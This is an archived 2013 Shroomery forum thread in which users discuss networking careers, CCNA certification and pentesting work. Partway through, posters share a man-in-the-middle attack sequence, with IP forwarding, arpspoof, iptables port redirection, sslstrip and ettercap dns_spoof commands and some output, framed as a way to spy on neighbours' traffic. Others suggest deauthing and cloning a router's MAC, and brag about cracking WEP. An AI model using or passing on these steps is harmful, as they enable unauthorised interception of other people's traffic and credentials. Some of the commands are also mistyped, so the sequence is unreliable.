Home | Community | Message Board

MagicBag Grow Bags
This site includes paid links. Please support our sponsors.

Welcome to the Shroomery Message Board! You are experiencing a small sample of what the site has to offer. Please login or register to post messages and view our exclusive members-only content. You'll gain access to additional forums, file attachments, board customizations, encrypted private messages, and much more!

Shop: Myyco.com Golden Teacher Liquid Culture For Sale   Kraken Kratom Red Vein Kratom   PhytoExtractum Kratom Powder for Sale   Bridgetown Botanicals CBD Concentrates

Jump to first unread post Pages: 1 | 2 | Next >  [ show all ]
Invisibledeadwk

Loc: Canada, eh? Flag
Computer Networking
    #18262112 - 05/14/13 03:41 AM (10 years, 10 months ago)

Just wondering if any other members of the Shroomery are in the networking field, or go to school for networking. If so what do you do?

:borat:

Extras: Filter Print Post Top
Offlineimachavel
I loved and lost but I loved-ftw
Male User Gallery

Loc: You get banned for saying that Flag
Re: Computer Networking [Re: deadwk]
    #18264476 - 05/14/13 04:13 PM (10 years, 10 months ago)

Quote:

thedeadwalkk said:
Just wondering if any other members of the Shroomery are in the networking field, or go to school for networking. If so what do you do?

:borat:

The simple answer, have a best friend in a corporation that is willing to hire you for 80k a year and teach you a lot about how their servers work and sponsor you to go get a CCNA certification

The complex answer. Learn OSes, for example windows and linux, learn about hard drives, ram, learn about browser security, securing network ports, encrypting folders, writing html, i.p. addresses and logging into routers, dedicating ethernet, straight through cabling categorization, and the difference between d.n.s. and d.h.c.p., 3 years of college, and possibly getting a job at best buy scanning old computers with less then 500w psu's and windows xp in safe mode for viruses and re formatting windows

:shrug: sorry, just being honest

--------------------
:kingcrankey: I did not say to edit my signature soulidarity! Now forever I will never remember what I said about understanding the secrets of the universe by paying attention to subtleties!

:facepalm: I'm never giving you the password again. Jerk

Invisibledeadwk

Re: Computer Networking [Re: imachavel]
    #18264492 - 05/14/13 04:15 PM (10 years, 10 months ago)

Quote:

imachavel said:
The simple answer, have a best friend in a corporation that is willing to hire you for 80k a year and teach you a lot about how their servers work and sponsor you to go get a CCNA certification

The complex answer. Learn OSes, for example windows and linux, learn about hard drives, ram, learn about browser security, securing network ports, encrypting folders, writing html, i.p. addresses and logging into routers, dedicating ethernet, straight through cabling categorization, and the difference between d.n.s. and d.h.c.p., 3 years of college, and possibly getting a job at best buy scanning old computers with less then 500w psu's and windows xp in safe mode for viruses and re formatting windows

I already have funds for CCNA taken care of, currently doing the second level.
I also already know everything you just listed :sad:

I've been told it's hard to get a job with just CCNA certification is this correct?

Offliner00tuuu123
Now I'm just really piseed
 User Gallery

Loc: I'll be there in a minute
    #18264599 - 05/14/13 04:43 PM (10 years, 10 months ago)

You may want to look into this http://www.offensive-security.com/ it is the future If you can code this is where the money is.

--------------------
:kingcrankey: Please report me to a Mod for hurting your punk ass hippie feelings :flipthebird: And all time Champion thread killer.:thatsayes:

Offlineimachavel
Male User Gallery

#18265061 - 05/14/13 06:15 PM (10 years, 10 months ago)

Quote:

thedeadwalkk said:
Quote:

imachavel said:

I already have funds for CCNA taken care of, currently doing the second level.
I also already know everything you just listed :sad:

I've been told it's hard to get a job with just CCNA certification is this correct?

Yes it is correct. Ok, let's say someone came into your building and you needed them to transfer all the accounts off a windows server while the server was still running, then replace a bunch of ram and hard drives in another server with a good mobo and decent processing power, then install linux from an .ISO on a cd disk to this other server, then transfer all the account information, and with the same windows server still running, set up and migrate all the networking tasks from the windows server with the linux server as the new server.

On top of that, they want you to run a virus scan on 94 computers in the building(each employees computer), but you also need to log into the router, and encrypt all the same ports on the new server that were on the other one, of course logging into the router is just confirming that the linux server is serving d.h.c.p. and configuring the same client i.p. addresses. You want to test all the ports after you re configured d.h.c.p. on the linux box without the need for a "domain controller" to make sure the same security is still working, and cross check to make sure the router is configured the same way. Also you need to configure some cross over cables between a router and switch, and need to create shorter cross over ethernet cables by crimping existing straight throughs, and changing the color combination to cross over the b, wb, b, wb, g, wg, o, wo.

Then they want you to re write the company web site a bit, so they don't have to hire an outside developer, and they are current hosting the web site at godaddy, you need to know css and html and at the same time understand that your building server isn't a d.n.s. web server and there is no name server or d.n.s. propagation qualities running just simple dedicated ethernet i.p. i/o addresses to all client computers.

While the CCNA class teaches you about this in theory, it goes through a lot of router syntax arguments for the command line, etc. but aside from this you are used to cmd and windows software, and not sure beyond the theory the true concept of software kernel routines, processes, how the software interfaces with hardware i/o, and un sure how to configure network processes in linux config files with bash command, sudo permissions, basic linux arguments etc.

Of course you did take the CCNA..... but then what are the differences between server main board form factor compared to standard ATX or mini ATX low profile, sure a server has the same ram, same motherboard hard drive interfaces, etc. But when the server goes down, or all the files aren't transferring through network protocol from one computer hard drive file system to another, can you really say your experience paid off?

You have the CCNA, and learned at Best Buy how to format a hard drive, you know what drivers are, library API, applications, the control panel, what the interface is, a little bit about java and c#, but have you extensively used your electronic knowledge in a work environment?

:lol: I mean....... I'd start with code, and learn about your own computer. I'd build 10 computers, sell them on E bay for a profit, start using linux, get your CCNA, then apply at all the corporate offices around you. I'm just not big on Certs, it's great though to get a cert and meet people in class that might get you a job where you build your skills. #1, avoid geeks, they are knowledgeable but learn their electronic skills, learn why base 2 binary is called base 2 binary, learn what apache and sql is and how applications use i/o to load and how files are read and written to a hard drive that is usually a SATA or SSD.

If you already know all this.... then why even ask :shrug:

--------------------
:kingcrankey: I did not say to edit my signature soulidarity! Now forever I will never remember what I said about understanding the secrets of the universe by paying attention to subtleties!

Offlineimachavel
Male User Gallery

Re: Computer Networking [Re: r00tuuu123]
    #18265072 - 05/14/13 06:19 PM (10 years, 10 months ago)

Quote:

r00tuuu123 said:
You may want to look into this http://www.offensive-security.com/ it is the future If you can code this is where the money is.

great stuff, you can charge banks a shit load to penetration test their bank

http://www.offensive-security.com/

wouldn't hurt to know a little about accounting as well, so they know when you are fucking raping their computer account numbers, you are doing it just to prove their vlan is hackable or whatever :lol:

--------------------

OfflineIcepic
Enlightenment seeking

Loc: Wild west
    #18265148 - 05/14/13 06:38 PM (10 years, 10 months ago)

Go start your own IT consulting company, I did, made bank last year just managing a group of small business clients, they need IT people too, and can't afford 80k a year, but made more then 80k last year split amongst them, and I have no college degree. A job is nice, till you get fired and lose your entire income stream, I lose a  client i can out and get three more to replace it Plus I got flexibility with my time corporate will own your ass if your an IT guy especially on salary. Fuck working for someone else IMO, I've been self employed since I was 12, had a job here and there but always had side businesses.

Offliner00tuuu123
 User Gallery

#18265253 - 05/14/13 07:04 PM (10 years, 10 months ago)

Quote:

imachavel said:
Quote:

r00tuuu123 said:

wouldn't hurt to know a little about accounting as well, so they know when you are fucking raping their computer account numbers, you are doing it just to prove their vlan is hackable or whatever :lol:

run an ssl strip it is fun you find out a lot about how boring your neighbors are :lolsy:

--------------------
:kingcrankey: Please report me to a Mod for hurting your punk ass hippie feelings :flipthebird: And all time Champion thread killer.:thatsayes:

Invisibledeadwk

#18265427 - 05/14/13 07:43 PM (10 years, 10 months ago)

Well right now I'm also doing A+, than in september will be taking introduction to linux servers, and the 3rd level of CCNA.

I'm just curious and wanted to hear from other people.

Quote:

Icepic said:
Go start your own IT consulting company, I did, made bank last year just managing a group of small business clients, they need IT people too, and can't afford 80k a year, but made more then 80k last year split amongst them, and I have no college degree. A job is nice, till you get fired and lose your entire income stream, I lose a  client i can out and get three more to replace it Plus I got flexibility with my time corporate will own your ass if your an IT guy especially on salary. Fuck working for someone else IMO, I've been self employed since I was 12, had a job here and there but always had side businesses.

Yea my dream job in the future would be to own a pentesting company.

Going to take this: https://www.offensive-security.com/information-security-training/penetration-testing-with-backtrack/ in september when I get back from vacation. Sound like a good option?

Edited by deadwk (05/14/13 07:56 PM)

Offlineimachavel
Male User Gallery

Re: Computer Networking [Re: Icepic]
    #18265655 - 05/14/13 08:32 PM (10 years, 10 months ago)

Quote:

Icepic said:

I agree with this. Better to learn whatever you can on your own. Get an account at www.ubuntu.com and build and sell as many computers from your house as you can. IT is hard, you might try and buy your own cisco router and build a small server with raid out of a computer you build with a motherboard that allows a raid controller, and go for a socket that accepts an i7 processor. Learn the ins and outs of file systems and i.p. addressing and ports. I know that's the simple definition, but i/o is the basis of all electronics.

I don't want to mirror the phrase "hack your way in" but try and learn to monitor a network and try and surf as many networks un monitored as possible. Corps definitely in the long run won't pay you as much as you working contract wise but knowing sales and clients and the difference between a shitty little room with a network printer and a virtual machine with windows server on your home computer with windows xp and a serious set of servers load balanced and mostly linux boxes serving d.n.s. is entirely different.

I feel this field is for the obsessed. I suppose if you aren't obsessed a corp. is good for you. Learning is always useful. Learn about cross platform code like c++ and java and Html as well. All computers function on i/o the software is just an interface but learning about drivers and sites that allow fake driver updates and install viruses, learning how to write a virus, and how they get through a port, will make you more money then you think.

--------------------

Invisibledeadwk

#18265790 - 05/14/13 09:03 PM (10 years, 10 months ago)

Quote:

imachavel said:
I agree with this. Better to learn whatever you can on your own. Get an account at www.ubuntu.com and build and sell as many computers from your house as you can. IT is hard, you might try and buy your own cisco router and build a small server with raid out of a computer you build with a motherboard that allows a raid controller, and go for a socket that accepts an i7 processor. Learn the ins and outs of file systems and i.p. addressing and ports. I know that's the simple definition, but i/o is the basis of all electronics.

Good idea, but it seems like it would be hard to market a computer you built yourself. I already know about file systems, ip addressing and ports.

Quote:

I don't want to mirror the phrase "hack your way in" but try and learn to monitor a network and try and surf as many networks un monitored as possible. Corps definitely in the long run won't pay you as much as you working contract wise but knowing sales and clients and the difference between a shitty little room with a network printer and a virtual machine with windows server on your home computer with windows xp and a serious set of servers load balanced and mostly linux boxes serving d.n.s. is entirely different.

I've done that to an extent, but nothing too too indepth. I suppose I could setup a simulated network on my computer through VMs. That does seem like a good idea.

Quote:

I feel this field is for the obsessed. I suppose if you aren't obsessed a corp. is good for you. Learning is always useful. Learn about cross platform code like c++ and java and Html as well. All computers function on i/o the software is just an interface but learning about drivers and sites that allow fake driver updates and install viruses, learning how to write a virus, and how they get through a port, will make you more money then you think.

I'm very obsessed with networking and computer, this field suits me perfectly :grin:

Offlineimachavel
Male User Gallery

#18265791 - 05/14/13 09:03 PM (10 years, 10 months ago)

Quote:

r00tuuu123 said:
Quote:

imachavel said:
Quote:

r00tuuu123 said:

run an ssl strip it is fun you find out a lot about how boring your neighbors are :lolsy:

sudo -i

echo '1' > /proc/sys/net/ipv4/ip_forward

netstat -nr
Kernel IP routing table
Destination    Gateway        Genmask        Flags  MSS Window  irtt Iface
0.0.0.0        192.168.1.254  0.0.0.0        UG        0 0          0 eth0
169.254.0.0    0.0.0.0        255.255.0.0    U        0 0          0 eth0
192.168.1.0    0.0.0.0        255.255.255.0  U        0 0          0 eth0

arpspoof -i eth0 192.168.8.8
0:13:20:37:87:1b ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.8.8 is-at 0:13:20:37:87:1b
0:13:20:37:87:1b ff:ff:ff:ff:ff:ff 0806 42: arp reply 192.168.8.8 is-at 0:13:20:37:87:1b

iptables -t nat -A PREROUTING -p tcp --desination-port 80 -j REDIRECT --to-port 8080
iptables v1.4.12: unknown option "--desination-port"
Try `iptables -h' or 'iptables --help' for more information.

ummmmmmmmmmmmmm.... iptables -t is giving me some problems. Do you have another argument for iptables besides -t that will make this command work? Sorry if I'm being vague I posted some command line arguments. Am I following this procedure correctly I keep thinking I'm just viewing LAN ip table information(which is good at this point), what arguments do I use to see public i.p. info and what node I am seen as to my I.S.P. to start viewing my neighbours info? Thanks a ton

--------------------

Offlineimachavel
Male User Gallery

#18265842 - 05/14/13 09:11 PM (10 years, 10 months ago)

Quote:

thedeadwalkk said:
Quote:

imachavel said:

Good idea, but it seems like it would be hard to market a computer you built yourself. I already know about file systems, ip addressing and ports.

You might not get rich, but you can sell a few on Ebay and mark it up a few hundred $, for example build a computer with an i7 processor, shroomism is obsessed with that he's got the links to newegg saved on his desktop or something :lol: with a windows disk ISO oem you probably can make a build with 8 gigs ram perhaps hybrid drive for $1000 including small HD monitor maybe $1200-$1300 of course I'd just sell a tower on Ebay with key board and mouse and let the user go to Best Buy and pick his favourite monitor. The same pc in the store will probably be $1500 with windows 8, you build it for $1000 sell it for $1200, make a small commission, of course I'd do this once or twice just for learning purposes. Sell the windows disk with the build, try and pick a low profile heat sink, you are on your way.

Once you've installed an OS a few times, uninstalled reinstalled a few applications, know what drivers are, safe sites to download windows updates, etc. you've got the basics now on to i.p. addressing even more basic but much more expensive to secure. Corps usually already have tons of network admins. I'd find small companies that basically hire I.T. consultants from time to time to crack their network. These guys usually charge a lot, so charging a little less will get you in the door. Eventually you'll have built a reputation and will be on your way to working with larger companies.

You'll need lot's of sales skills to identify which companies have over paid network admins, have over priced shitty I.T. consultants etc. It'll take quite a few years to break into the market maybe 3-6 but if you keep chugging at it you'll get there, and in the mean time build a bunch of Pc's, there's no end to pc building knowledge on here. :thumbup:

--------------------

Invisibleteknix
π“‚€βŸπ“…’π“π“…ƒπ“Š°π“‰‘ 𓁼𓆗⨻
 User Gallery

#18266372 - 05/14/13 10:48 PM (10 years, 10 months ago)

I'm planning to do B.A. in Computer Science with networking/admin focus and then a B.S. in Biology with genetics focus and minor in informatics.

I think a Computer Science Degree can land a decent job around 50k a year no problem, and many part-time posibilities as well.

It is hard to say what is the best course for you, because there is mu

Quote:

imachavel said:
Quote:

r00tuuu123 said:
Quote:

imachavel said:
Quote:

r00tuuu123 said:

sudo -i

netstat -nr
Kernel IP routing table

iptables -t nat -A PREROUTING -p tcp --desination-port 80 -j REDIRECT --to-port 8080

ummmmmmmmmmmmmm.... iptables -t is giving me some problems. Do you have another argument for iptables besides -t that will make this command work? Sorry if I'm being vague I posted some command line arguments. Am I following this procedure correctly I keep thinking I'm just viewing LAN ip table information(which is good at this point), what arguments do I use to see public i.p. info and what node I am seen as to my I.S.P. to start viewing my neighbours info? Thanks a ton

Aren't you suppose to clone the MAC and Deauth him while emulating the router and then setting your NIC to masquerade as his router to accept the auto re-connection attempt while logging the authentication packets?

Offlineimachavel
Male User Gallery

Re: Computer Networking [Re: teknix]
    #18267291 - 05/15/13 03:48 AM (10 years, 10 months ago)

Quote:

teknix said:
I'm planning to do B.A. in Computer Science with networking/admin focus and then a B.S. in Biology with genetics focus and minor in informatics.

I think a Computer Science Degree can land a decent job around 50k a year no problem, and many part-time posibilities as well.

It is hard to say what is the best course for you, because there is mu

Quote:

imachavel said:
Quote:

r00tuuu123 said:
Quote:

imachavel said:

sudo -i

netstat -nr
Kernel IP routing table

Aren't you suppose to clone the MAC and Deauth him while emulating the router and then setting your NIC to masquerade as his router to accept the auto re-connection attempt while logging the authentication packets?

Probably. But in the meanwhile I misspelled "destination port", I'm just testing re directing a few ports to make sure SSL strip works. I didn't really do a full ifconfig or arp or iptables to really look at my i.p. tables and see if the spoof was configured correctly, but just to test re direction:

root@*****-Di*****on-**00:~#    arpspoof -i eth0 192.168.8.8 

sslstrip -l 8080

sslstrip 0.9 by Moxie Marlinspike running...
sudo ettercap -T -q -i

After I got that far I stopped, I couldn't think of a network interface to scan or was familiar with the file system of that network to continue to try and scan, the full argument should be as such:

sudo ettercap -T -q -i <network interface> -m "home/path/to/log/" -P dns_spoof

Fun to consider of course. Sorry to be so vague, kind of hard to want to disclose specifics if I'm testing hacking the shit out of something. Good learning though, good learning

--------------------

Offliner00tuuu123
 User Gallery

#18268986 - 05/15/13 02:13 PM (10 years, 10 months ago)

You can also check this out a ton of good info. http://www.hackforums.net/forumdisplay.php?fid=104
http://www.aircrack-ng.org/ Especially Janos tuts 
P.s. don't run ettercap In with ssl it throws a monkey wrench into the works Btw Moxies tut on straight ssl is excellent. PPS Nessus is nice too .you wanna check out a remote network. Right now my ip is
10.1.10.12 but next time it may be different.

--------------------

Edited by r00tuuu123 (05/15/13 02:44 PM)

Invisibledeadwk

#18275848 - 05/16/13 08:35 PM (10 years, 10 months ago)

Haha in my networking class (all guys) we're doing some subnet calculation, and it comes up as a joke that "girl's love math."

So this guy in my class as a joke says "how big is you're subnet"

Offliner00tuuu123
 User Gallery

#18276687 - 05/16/13 11:40 PM (10 years, 10 months ago)

Now it is this. 192.168 ,1.67 but a simple wep crack :laugh2:

--------------------

Offlineimachavel
Male User Gallery

#18286816 - 05/19/13 07:31 AM (10 years, 10 months ago)

Quote:

thedeadwalkk said:
Haha in my networking class (all guys) we're doing some subnet calculation, and it comes up as a joke that "girl's love math."

So this guy in my class as a joke says "how big is you're subnet"

god I hate that shit :facepalm:

256 128 64 32 16 8 4 2 1

0    1  0  1  0 1 0 0 0

like how will you use that shit unless you plan to be an electronic engineer or a c programmer? Actually c programming I never hear of people re writing the kernel. Kind of has nothing to do with logging into a router :lol:

--------------------

Invisibledeadwk

#18288576 - 05/19/13 04:39 PM (10 years, 10 months ago)

Quote:

imachavel said:
god I hate that shit :facepalm:

256 128 64 32 16 8 4 2 1

0    1  0  1  0 1 0 0 0

like how will you use that shit unless you plan to be an electronic engineer or a c programmer? Actually c programming I never hear of people re writing the kernel. Kind of has nothing to do with logging into a router :lol:

:lolwut:

Subnetting is so easy haha, one of the easiest things to do in the computer networking field I find. You use that  when you have to setup and subnet a network address for multiple lans, etc... So it's pretty important!

It's also useful when having to configure the actual interfaces of the router, as well as when creating and or updating the routing table.

Edited by deadwk (05/19/13 11:27 PM)

Jump to top Pages: 1 | 2 | Next >  [ show all ]

Shop: Myyco.com Golden Teacher Liquid Culture For Sale   Kraken Kratom Red Vein Kratom   PhytoExtractum Kratom Powder for Sale   Bridgetown Botanicals CBD Concentrates